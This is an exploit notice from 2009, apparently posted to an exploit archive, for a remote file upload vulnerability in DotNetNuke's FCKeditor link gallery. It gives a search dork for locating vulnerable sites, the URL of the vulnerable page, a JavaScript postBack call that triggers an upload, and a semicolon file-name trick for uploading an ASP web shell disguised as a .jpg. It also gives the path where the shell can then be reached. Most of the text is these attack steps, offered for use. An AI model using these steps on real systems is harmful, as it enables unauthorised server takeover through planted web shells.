************************************************************
** DotNetNuke Remote File upload Vulnerability
************************************************************
** Prodcut: DotNetNuke
** Home : www.DZ4All.cOm/Cc
** Vunlerability : Remote File upload
** Risk : High
** Dork : inurl:tabid/176/Default.aspx or inurl:portals/0/
************************************************************
**
** Original discovery and credit goes to: Alireza Afzali of ISCN Team
** Found date: 5/17/2009
** http://securityreason.com/exploitalert/6234
**
** Authors : Ra3cH & Ma3sTr0-Dz
** From : Algeria
** Contact : e51@hotmail.fr
** *********************************************************
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz
************************************************************
** Exploit:
** http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
**
** AnD Add : javascript:__doPostBack('ctlURL$cmdUpload','')
**
**
** AnD UpLOaD YoUr ShEll AsP LiKe Dz4aLL.asp;me.jpg
************************************************************
**
** you find your Shell Hier
**
** http://[PATH]/portals/0/dz4all.asp;me.jpg
*************************************************************
